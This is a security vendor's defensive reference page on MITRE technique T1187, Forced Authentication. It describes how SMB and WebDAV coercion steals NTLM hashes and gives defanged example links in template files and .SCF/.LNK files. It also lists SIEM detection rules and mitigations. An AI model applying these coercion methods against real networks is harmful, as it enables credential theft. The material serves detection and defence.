MaxPatrol SIEM

Detects cyberincidents that undermine cyber resilience of a company

T1187: Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials.

There are several different ways this can occur. Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_cred_access: PT-CR-1075: Dangerous_Theme: A potentially malicious Windows theme that is used to steal usernames and password hashes is applied
mitre_attck_cred_access: PT-CR-1204: Coerce_Auth: The NTLM hash of a host machine account is intercepted as a result of authentication coercion
mitre_attck_lateral_movement: PT-CR-784: Auth_Coerce_with_WebClient_Abuse: Use of WebClient to force HTTP authorization (port 80) on an attacking host via PetitPotam or PrinterBug is detected
vulnerabilities: PT-CR-2297: CVE_2024_21413_Outlook_MonikerLink: Exploitation of vulnerability CVE-2024-21413 in Outlook. The vulnerability allows an attacker to send a victim an email with a hyperlink to a shared network resource and bypass the Outlook warning when opening the email. This can be used to execute an arbitrary code or get the user's NetNTLM hash.
mitre_attck_cred_access: PT-CR-913: Subrule_Coerce_Auth: Possible authentication coercion is detected
mitre_attck_cred_access: PT-CR-914: Subrule_Egress_System: Connection to an attacker host that might indicate a coerced authentication is detected
mitre_attck_cred_access: PT-CR-2348: SCF_or_URL_Forced_Authentication: Possible forced user authentication using .scf or .url files. Such authentication allows attackers to obtain NTLM password hashes of users who open a network share with these files using Windows Explorer. Attackers can then use these hashes for attacks such as Pass-the-Hash, or to bruteforce passwords in clear text and use them to gain access to other systems.
mitre_attck_cred_access: PT-CR-2349: SCF_or_URL_File_Created: Possible forced user authentication using .scf or .url files. Such authentication allows attackers to obtain NTLM password hashes of users who open a local folder or network share with these files using Windows Explorer. Attackers can then use these hashes for attacks such as Pass-the-Hash, or to bruteforce passwords in clear text and use them to gain access to other systems.
active_directory_attacks: PT-CR-837: KrbRelay_Usage: There are signs of using the KrbRelay or DavRelayUp utility, which allows you to use the lack of signature of LDAP requests to relay the authentication process and receive a TGS ticket for the SPN account on behalf of the administrator. After that, an attacker can elevate their privileges to a local administrator and execute malicious code on a compromised node
active_directory_attacks: PT-CR-2225: ADCS_CRL_Abusing: Suspicious activity with a certificate revocation list (CRL). Access to a CRL allows attackers to force the CA server to authenticate on a remote server or remotely execute code on the CA server. For this rule to work, you must complete the "CRL_Publication_Time" tabular list.
active_directory_attacks: PT-CR-2226: ADCS_Certify_Coerce: The NTLM hash or TGT of a CA server account was obtained using coerced authentication. This data can then be used to compromise the CA server and further develop the attack.
pt_nad: PT-CR-2417: NAD_NTLM_to_External: PT NAD detected a Net-NTLM hash being sent from a host to the Internet

Detection

IDDS0029Data source and componentNetwork Traffic: Network Traffic ContentDescription

For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

IDDS0029Data source and componentNetwork Traffic: Network Traffic FlowDescription

Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems.If attempts are detected, then investigate endpoint data sources to find the root cause.

IDDS0022Data source and componentFile: File AccessDescription

Monitor for unexpected files used to gather credentials when the files are rendered

IDDS0022Data source and componentFile: File ModificationDescription

Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources

IDDS0022Data source and componentFile: File CreationDescription

Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources

Mitigation

IDM1027NamePassword PoliciesDescription

Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.

IDM1037NameFilter Network TrafficDescription

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with allowlisting.